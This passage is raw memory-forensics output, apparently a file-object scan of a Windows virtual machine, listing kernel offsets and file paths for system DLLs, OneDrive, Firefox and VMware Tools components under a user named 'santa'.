Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\clrcompression.dll 216 +0x918b7697a470 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\OneSettingsClientForwarder.dll 216 +0x918b7697a600 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll 216 +0x918b7697a790 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b7697a920 \$Directory 216 +0x918b7697add0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Assets\PhotosIcons.ttf 216 +0x918b7697b0f0 \$Directory 216 +0x918b7697b280 \Windows\System32\en-US\twinui.dll.mui 216 +0x918b7697b5a0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\OnlineMediaComponent.dll 216 +0x918b7697b8c0 \Windows\Fonts\segoeui.ttf 216 +0x918b7697bbe0 \$Directory 216 +0x918b7697bd70 \Windows\System32\RuntimeBroker.exe 216 +0x918b7697c090 \$Directory 216 +0x918b7697c220 \Windows\ShellComponents\WindowsInternal.ComposableShell.Experiences.Switcher.dll 216 +0x918b7697c3b0 \Windows\Fonts\segoeui.ttf 216 +0x918b7697c540 \ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\UpdateLock-E7CF176E110C211B 216 +0x918b7697c6d0 \CMApi 216 +0x918b7697c860 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b7697c9f0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\AppSettingsCppCX.dll 216 +0x918b7697cb80 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat 216 +0x918b7697cd10 \Windows\ShellComponents\TaskFlowUI.dll 216 +0x918b7697cea0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1 216 +0x918b7697d1c0 \CMNotify 216 +0x918b7697d350 \$Directory 216 +0x918b7697d990 \$Directory 216 +0x918b7697db20 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG2 216 +0x918b7697dcb0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b7697de40 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Search.winmd 216 +0x918b7697e2f0 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b7697e480 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll 216 +0x918b7697e7a0 \Windows\System32\en-US\user32.dll.mui 216 +0x918b7697e930 \Windows\System32\smartscreen.exe 216 +0x918b7697ec50 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll 216 +0x918b7697f290 \MsFteWds 216 +0x918b7697f420 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b7697f5b0 \Windows\System32 216 +0x918b7697f8d0 \Windows\System32\WinRtTracing.dll 216 +0x918b7697fa60 \Windows\System32\ieframe.dll 216 +0x918b7697fbf0 \Windows\System32\WinMetadata\Windows.Storage.winmd 216 +0x918b7697fd80 \Windows\System32\en-US\smartscreen.exe.mui 216 +0x918b769800a0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76980230 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b769803c0 \Windows\System32\WinMetadata\Windows.Security.winmd 216 +0x918b76980550 \$Directory 216 +0x918b769806e0 \Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\concrt140_app.dll 216 +0x918b76980870 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Assets\PhotosIcons.ttf 216 +0x918b76980a00 \Windows\System32\en-US\windows.ui.xaml.dll.mui 216 +0x918b76980d20 \Windows\System32\en-US\ApplicationFrame.dll.mui 216 +0x918b76980eb0 \Windows\Fonts\StaticCache.dat 216 +0x918b769811d0 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Tips.winmd 216 +0x918b76981680 \Windows\SysWOW64\dnsapi.dll 216 +0x918b76981810 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\SharedStyles.dll 216 +0x918b76981b30 \CMNotify 216 +0x918b76981cc0 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b76981e50 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76982170 \Windows\System32\wscinterop.dll 216 +0x918b76982300 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\RB2ZB7BJ 216 +0x918b76982490 \$Directory 216 +0x918b769827b0 \Windows\System32\WinMetadata\Windows.System.winmd 216 +0x918b76982ad0 \$Directory 216 +0x918b76982c60 \Windows\System32\wdmaud.drv 216 +0x918b76983430 \$Directory 216 +0x918b769835c0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76983750 \Windows\System32\en-US\explorerframe.dll.mui 216 +0x918b769838e0 \Windows\System32\en-US\newdev.dll.mui 216 +0x918b76983c00 \Windows\System32\WinMetadata\Windows.UI.winmd 216 +0x918b76983d90 \Windows\System32\mlang.dll 216 +0x918b769840b0 \Windows\System32\winbio.dll 216 +0x918b769843d0 \Windows\System32\en-US\dnsapi.dll.mui 216 +0x918b76984560 \Users\santa\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 216 +0x918b769846f0 \Program Files\Windows Defender\shellext.dll 216 +0x918b76984880 \$Directory 216 +0x918b76984a10 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SPA.winmd 216 +0x918b76984ba0 \$Directory 216 +0x918b76984d30 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76984ec0 \$Directory 216 +0x918b769851e0 \Windows\System32\SecurityHealthSystray.exe 216 +0x918b76985370 \Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 216 +0x918b76985500 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b76985690 \$Directory 216 +0x918b76985820 \Windows\System32\WinMetadata\Windows.UI.winmd 216 +0x918b769859b0 \Windows\System32\en-US\Windows.Web.Http.dll.mui 216 +0x918b76985b40 \Windows\Registration\R000000000006.clb 216 +0x918b76985cd0 \Windows\System32\SecurityHealthSSO.dll 216 +0x918b76985e60 \Windows\System32\en-US\Conhost.exe.mui 216 +0x918b76986180 \Windows\Registration\R000000000006.clb 216 +0x918b76986630 \Windows\SysWOW64\wtsapi32.dll 216 +0x918b769867c0 \Windows\System32\en-US\securityhealthsso.dll.mui 216 +0x918b76986950 \Program Files\Windows Photo Viewer\PhotoBase.dll 216 +0x918b76986c70 \Windows\SysWOW64\version.dll 216 +0x918b76986e00 \Windows\System32\SecurityHealthService.exe 216 +0x918b76987120 \Windows\System32\en-US\combase.dll.mui 216 +0x918b769872b0 \Windows\System32 216 +0x918b769875d0 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b769878f0 \Windows\ShellExperiences\TileControl.dll 216 +0x918b76987a80 \Windows\Registration\R000000000006.clb 216 +0x918b76987c10 \Windows\System32\SecurityHealthSystray.exe 216 +0x918b76988250 \Windows\SysWOW64\ExplorerFrame.dll 216 +0x918b76988570 \CMApi 216 +0x918b76988890 \Windows\System32\en-US\user32.dll.mui 216 +0x918b76988a20 \$Directory 216 +0x918b76988bb0 \Windows\System32\vm3dservice.exe 216 +0x918b76988ed0 \Windows\System32\Windows.WARP.JITService.dll 216 +0x918b769891f0 \Program Files\VMware\VMware Tools\vmtoolsd.exe 216 +0x918b76989380 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b76989510 \Windows\System32\SecurityHealthProxyStub.dll 216 +0x918b769896a0 \ProgramData\Microsoft\Windows Security Health\Logs\SHS-11172023-155129-7-3f-18362.1.amd64fre.19h1_release.190318-1202.etl 216 +0x918b76989830 \Windows\Registration\R000000000006.clb 216 +0x918b769899c0 \$Directory 216 +0x918b76989b50 \CMApi 216 +0x918b76989ce0 \Windows\SysWOW64\dhcpcsvc6.dll 216 +0x918b7698a190 \Windows\Registration\R000000000006.clb 216 +0x918b7698a320 \Windows\SysWOW64\IPHLPAPI.DLL 216 +0x918b7698a4b0 \$Directory 216 +0x918b7698a7d0 \Windows\System32\vm3dservice.exe 216 +0x918b7698a960 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b7698ae10 \Windows\System32 216 +0x918b7698b130 \Windows\System32 216 +0x918b7698b450 \$Directory 216 +0x918b7698b5e0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b7698b770 \Input 216 +0x918b7698b900 \Windows\Fonts\segoeuil.ttf 216 +0x918b7698ba90 \Program Files\VMware\VMware Tools\plugins\vmusr\dndcp.dll 216 +0x918b7698bc20 \Program Files\VMware\VMware Tools\sigc-2.0.dll 216 +0x918b7698bdb0 \Windows\System32\keepaliveprovider.dll 216 +0x918b7698c3f0 \$Directory 216 +0x918b7698c580 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncCxP.dll 216 +0x918b7698c710 \Output 216 +0x918b7698c8a0 \Windows\Fonts\segoeui.ttf 216 +0x918b7698cd50 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b7698d200 \CMApi 216 +0x918b7698d520 \Windows\Fonts\times.ttf 216 +0x918b7698d6b0 \Users\santa\AppData\Local\Microsoft\OneDrive\OneDrive.exe 216 +0x918b7698d840 \Windows\System32\mfcore.dll 216 +0x918b7698d9d0 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b7698de80 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\en\FileSync.LocalizedResources.dll.mui 216 +0x918b7698e1a0 \Windows\Temp\vmware-vmusr-santa.log 216 +0x918b7698e330 \Windows\Fonts\seguisb.ttf 216 +0x918b7698e4c0 \Program Files\VMware\VMware Tools\plugins\vmusr\desktopEvents.dll 216 +0x918b7698e650 \$Directory 216 +0x918b7698e7e0 \CMApi 216 +0x918b7698e970 \$Directory 216 +0x918b7698eb00 \Windows\System32\wscui.cpl 216 +0x918b7698ee20 \Windows\System32\UIRibbon.dll 216 +0x918b7698f140 \Program Files\VMware\VMware Tools\plugins\vmusr\vmtray.dll 216 +0x918b7698f2d0 \Windows\System32\mfc140enu.dll 216 +0x918b7698f460 \Windows\Registration\R000000000006.clb 216 +0x918b7698f910 \CMApi 216 +0x918b7698fc30 \Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7 216 +0x918b7698fdc0 \Windows\System32\mfc140u.dll 216 +0x918b769900e0 \Windows\System32\en-US\mpr.dll.mui 216 +0x918b76990400 \Windows 216 +0x918b76990590 \Windows\System32\Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll 216 +0x918b76990720 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.18362.30_none_e685621eb27f4d6a\comctl32.dll 216 +0x918b769908b0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.18362.30_none_e685621eb27f4d6a 216 +0x918b76990a40 \Windows\System32\winevt\Logs\microsoft-windows-diagnosis-scripted%4operational.evtx 216 +0x918b76990d60 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b76990ef0 \CMApi 216 +0x918b76991080 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76991210 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b769913a0 \Windows\System32 216 +0x918b76991530 \Windows\SysWOW64\Windows.UI.dll 216 +0x918b769916c0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncClient.dll 216 +0x918b76991d00 \Windows\Temp\vmware-vmusr-santa.log 216 +0x918b76992340 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\msvcp140.dll 216 +0x918b769927f0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\vcruntime140_1.dll 216 +0x918b76992b10 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\LoggingPlatform.dll 216 +0x918b76992ca0 \$Directory 216 +0x918b76992e30 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\vcruntime140.dll 216 +0x918b76993150 \Windows\System32\ntlanman.dll 216 +0x918b76993790 \Windows\System32\CapabilityAccessHandlers.dll 216 +0x918b76993ab0 \$Directory 216 +0x918b76993c40 \Windows\SysWOW64\userenv.dll 216 +0x918b769945a0 \Windows\System32\drprov.dll 216 +0x918b769948c0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\ucrtbase.dll 216 +0x918b76994be0 \Windows\System32\davclnt.dll 216 +0x918b76994d70 \Windows\System32\SystemSettings.DataModel.dll 216 +0x918b76995860 \Windows\System32\davhlpr.dll 216 +0x918b76996350 \Program Files (x86)\Mozilla Firefox 216 +0x918b76996e40 \Program Files (x86)\Mozilla Firefox 216 +0x918b769977a0 \Users\santa\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2023-11-17.2351.4628.2.aodl 216 +0x918b76997930 \Program Files (x86)\Mozilla Firefox 216 +0x918b76997960 禸皙醋￿禸皙醋￿ 0 +0x918b76997c50 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\OneDriveTelemetryStable.dll 216 +0x918b76997de0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\LogUploader.dll 216 +0x918b76998100 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncViews.dll 216 +0x918b76998290 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\WebView2Loader.dll 216 +0x918b76998420 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFS.dll 216 +0x918b769985b0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncEvents.dll 216 +0x918b76998740 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\msvcp140_atomic_wait.dll 216 +0x918b769988d0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\WnsClientApi.dll 216 +0x918b76998a60 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Core.dll 216 +0x918b76998bf0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\adal.dll 216 +0x918b76998d80 \CMApi 216 +0x918b769990a0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncRNWin32Lib.dll 216 +0x918b76999230 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Quick.dll 216 +0x918b769993c0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Telemetry.dll 216 +0x918b76999550 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Gui.dll 216 +0x918b769996e0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b76999870 \Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7 216 +0x918b76999a00 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Qml.dll 216 +0x918b76999b90 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5WinExtras.dll 216 +0x918b76999d20 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncSqlite3.dll 216 +0x918b76999eb0 \Windows\System32\credui.dll 216 +0x918b7699a1d0 \Windows\System32\WinMetadata\Windows.Web.winmd 216 +0x918b7699a360 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\libcrypto-1_1-x64.dll 216 +0x918b7699a4f0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\msvcp140_1.dll 216 +0x918b7699a680 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncTelemetryExtensions.dll 216 +0x918b7699a810 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncHost.dll 216 +0x918b7699a9a0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncSessions.dll 216 +0x918b7699ab30 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\SyncEngine.dll 216 +0x918b7699acc0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b7699ae50 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\UpdateRingSettings.dll 216 +0x918b7699b170 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Network.dll 216 +0x918b7699b620 \Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SettingsDatabase.db 216 +0x918b7699b7b0 \MsFteWds 216 +0x918b7699b940 \Windows\System32\Windows.UI.Input.Inking.Analysis.dll 216 +0x918b7699bc60 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b7699bdf0 \Windows\System32\en-US\Windows.UI.dll.mui 216 +0x918b7699c110 \$Directory 216 +0x918b7699c2a0 \ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b7699c750 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\libssl-1_1-x64.dll 216 +0x918b7699c8e0 \Windows\System32\svchost.exe 216 +0x918b7699cc00 \Windows\System32\efswrt.dll 216 +0x918b7699cd90 \Windows\SystemResources\Chakra.dll.mun 216 +0x918b7699d0b0 \Windows\Fonts\segoeuib.ttf 216 +0x918b7699d3d0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b7699d6f0 \Windows\System32 216 +0x918b7699dba0 \Windows\Fonts\Sitka.ttc 216 +0x918b7699dd30 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5QmlModels.dll 216 +0x918b7699dec0 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal 216 +0x918b7699e1e0 \Windows\SysWOW64\OneCoreCommonProxyStub.dll 216 +0x918b7699e690 \Windows\System32 216 +0x918b7699e820 \Windows\System32\InkObjCore.dll 216 +0x918b7699e9b0 \Windows\Fonts\SitkaI.ttc 216 +0x918b7699eb40 \Windows\System32\configmanager2.dll 216 +0x918b7699f310 \$Directory 216 +0x918b7699f4a0 \$Directory 216 +0x918b7699f7c0 \Windows\SysWOW64\ntshrui.dll 216 +0x918b7699fc70 \Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx 216 +0x918b7699fe00 \Windows\Fonts\SitkaZ.ttc 216 +0x918b769a0120 \Windows\System32\SettingsEnvironment.Desktop.dll 216 +0x918b769a05d0 \Windows\System32\AdaptiveCards.dll 216 +0x918b769a08f0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFSNtfs.dll 216 +0x918b769a0a80 \Windows\System32\regapi.dll 216 +0x918b769a0da0 \Dev\Query 216 +0x918b769a13e0 \$Directory 216 +0x918b769a1570 \Windows\SysWOW64\en-US\taskschd.dll.mui 216 +0x918b769a1700 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe 216 +0x918b769a1890 \Windows\Fonts\calibri.ttf 216 +0x918b769a1bb0 \Windows\SysWOW64\policymanager.dll 216 +0x918b769a1d40 \$Directory 216 +0x918b769a1ed0 \Windows\SysWOW64\srvcli.dll 216 +0x918b769a21f0 \Windows\SysWOW64\cscapi.dll 216 +0x918b769a2380 \Windows\System32\en-US\windows.applicationmodel.datatransfer.dll.mui 216 +0x918b769a2510 \Users\santa\AppData\Local\Microsoft\Windows\WebCache\V01.loglog 216 +0x918b769a2830 \Windows\System32\enterpriseresourcemanager.dll 216 +0x918b769a29c0 \CMApi 216 +0x918b769a2b50 \$Directory 216 +0x918b769a2e70 \Windows\System32\en-US\ole32.dll.mui 216 +0x918b769a3190 \Windows\System32\en-US\avrt.dll.mui 216 +0x918b769a3320 \Windows\System32\en-US\combase.dll.mui 216 +0x918b769a3640 \Reference 216 +0x918b769a37d0 \Windows\System32\dmiso8601utils.dll 216 +0x918b769a3960 \Windows\System32\dmoleaututils.dll 216 +0x918b769a3c80 \Server 216 +0x918b769a3e10 \Windows\SysWOW64\msvcp110_win.dll 216 +0x918b769a4130 \Windows\System32\DictationManager.dll 216 +0x918b769a42c0 \Dev\Query 216 +0x918b769a4450 \Windows\System32\conhost.exe 216 +0x918b769a45e0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edb.log 216 +0x918b769a4770 \$Directory 216 +0x918b769a4900 \$ConvertToNonresident 216 +0x918b769a4a90 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFSNtfsWB.dll 216 +0x918b769a4c20 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\platforms\qwindows.dll 216 +0x918b769a4db0 \CMApi 216 +0x918b769a50d0 \Windows\SysWOW64\winsta.dll 216 +0x918b769a5260 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b769a53f0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFALWB.dll 216 +0x918b769a5710 \$Directory 216 +0x918b769a58a0 \$Directory 216 +0x918b769a5a30 \Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SettingsDatabase.db-wal 216 +0x918b769a5bc0 \Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SettingsDatabase.db-shm 216 +0x918b769a5d50 \$Directory 216 +0x918b769a5ee0 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSync.Resources.dll 216 +0x918b769a6200 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFSCache.dll 216 +0x918b769a6390 \Windows\System32\en-US\windows.ui.xaml.dll.mui 216 +0x918b769a6520 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSync.LocalizedResources.dll 216 +0x918b769a66b0 \Dev\Query 216 +0x918b769a6b60 \Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SyncEngineDatabase.db 216 +0x918b769a6cf0 \Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SyncEngineDatabase.db-wal 216 +0x918b769a6e80 \Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SyncEngineDatabase.db-shm 216 +0x918b769a71a0 \Users\santa\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-11-17_235151_4628-4616.log 216 +0x918b769a7330 \$Directory 216 +0x918b769a74c0 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b769a7c90 \gecko.4576.3988.4196779259130090733 216 +0x918b769a8140 \Windows\Fonts\arial.ttf 216 +0x918b769a82d0 \Windows\System32\ELSCore.dll 216 +0x918b769a8780 \Windows\System32\MicrosoftAccountTokenProvider.dll 216 +0x918b769a8910 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b769a8aa0 \CMApi 216 +0x918b769a90e0 \Windows\System32\Wpc.dll 216 +0x918b769a9590 \Program Files (x86)\Mozilla Firefox 216 +0x918b769a9720 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b769a98b0 \Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi 216 +0x918b769a9a40 \Windows\System32\en-US\SHCore.dll.mui 216 +0x918b769a9d60 \gecko.4576.3988.4196779259130090733 216 +0x918b769aa080 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\en\FileSync.LocalizedResources.dll.mui 216 +0x918b769aa210 \Users\santa\AppData\Local\Microsoft\Credentials 216 +0x918b769aa3a0 \Users\santa\AppData\Roaming\Microsoft\Credentials 216 +0x918b769aa850 \Windows\System32\msIso.dll 216 +0x918b769aa9e0 \Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\dosvcState.dat.LOG2 216 +0x918b769aab70 \$Directory 216 +0x918b769aae90 \gecko.4576.3988.14258203149884878546 216 +0x918b769ab340 \$Directory 216 +0x918b769ab4d0 \Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20231117_235156_845.etl 216 +0x918b769ab7f0 \$Directory 216 +0x918b769ab980 \Windows\System32\ngcpopkeysrv.dll 216 +0x918b769abca0 \Windows\Fonts\tahomabd.ttf 216 +0x918b76abd9d0 \$NonCachedIo 216 +0x918b76abdb40 \$NonCachedIo 216 +0x918b76ac0660 \$NonCachedIo 216 +0x918b76c2b1e0 \Windows\Prefetch\SEARCHPROTOCOLHOST.EXE-C6CFE2A8.pf 216 +0x918b76c2b370 \Windows\System32\en-US\Windows.Security.Authentication.Web.Core.dll.mui 216 +0x918b76c2b500 \Windows\SystemResources\Windows.UI.ShellCommonInetCore\Windows.UI.ShellCommonInetCore.pri 216 +0x918b76c2b820 \Windows\System32\backgroundTaskHost.exe 216 +0x918b76c2b9b0 \Windows\System32\en-US\AppXDeploymentServer.dll.mui 216 +0x918b76c2bb40 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eView.dll 216 +0x918b76c2bcd0 \CMNotify 216 +0x918b76c2be60 \Windows\System32\dsclient.dll 216 +0x918b76c2c180 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b76c2c310 \Windows\System32\StorageUsage.dll 216 +0x918b76c2c4a0 \Windows 216 +0x918b76c2c630 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\HxTsr.exe 216 +0x918b76c2c950 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b76c2cae0 \CMNotify 216 +0x918b76c2cc70 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b76c2ce00 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b76c2d120 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b76c2d2b0 \Windows\Fonts\segoeuil.ttf 216 +0x918b76c2d5d0 \CMNotify 216 +0x918b76c2d760 \Windows\Fonts\cambriaz.ttf 216 +0x918b76c2d8f0 \Windows\System32\en-US\ntasn1.dll.mui 216 +0x918b76c2da80 \Sessions\1\AppContainerNamedObjects\S-1-15-2-2551677095-2355568638-4209445997-2436930744-3692183382-387691378-1866284433 216 +0x918b76c2dc10 \$Directory 216 +0x918b76c2dda0 \CMNotify 216 +0x918b76c2e0c0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db 216 +0x918b76c2e250 \Windows\System32\StorSvc.dll 216 +0x918b76c2e3e0 \Windows\SystemResources\ExplorerFrame.dll.mun 216 +0x918b76c2e700 \Users\santa\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2023-11-17.2323.5328.2.odlgz 216 +0x918b76c2e890 \$Directory 216 +0x918b76c2ea20 \$Directory 216 +0x918b76c2ebb0 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json 216 +0x918b76c2ed40 \Windows\System32\backgroundTaskHost.exe 216 +0x918b76c2eed0 \$Directory 216 +0x918b76c2f1f0 \Windows\System32 216 +0x918b76c2f380 \Windows\Prefetch\TRUSTEDINSTALLER.EXE-B018CCBF.pf 216 +0x918b76c2f510 \Windows\System32\backgroundTaskHost.exe 216 +0x918b76c2f6a0 \Windows\System32\en-US\jscript9.dll.mui 216 +0x918b76c2f830 \Windows\System32 216 +0x918b76c2f9c0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b76c2fce0 \wkssvc 216 +0x918b76c2fe70 \Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx 216 +0x918b76c30190 \Windows\Prefetch\MUSNOTIFYICON.EXE-19B43B6D.pf 216 +0x918b76c304b0 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\a52b0784bd667468.automaticDestinations-ms 216 +0x918b76c30640 \Windows\explorer.exe 216 +0x918b76c307d0 \Users\santa\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2023-11-17.2351.4628.1.odlgz 216 +0x918b76c30960 \Windows\System32\SyncRes.dll 216 +0x918b76c30af0 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9d1f905ce5044aee.automaticDestinations-ms 216 +0x918b76c30c80 \$Directory 216 +0x918b76c30e10 \Sessions\1\AppContainerNamedObjects\S-1-15-2-1609473798-1231923017-684268153-4268514328-882773646-2760585773-1760938157 216 +0x918b76c31130 \Windows\System32\PhoneutilRes.dll 216 +0x918b76c312c0 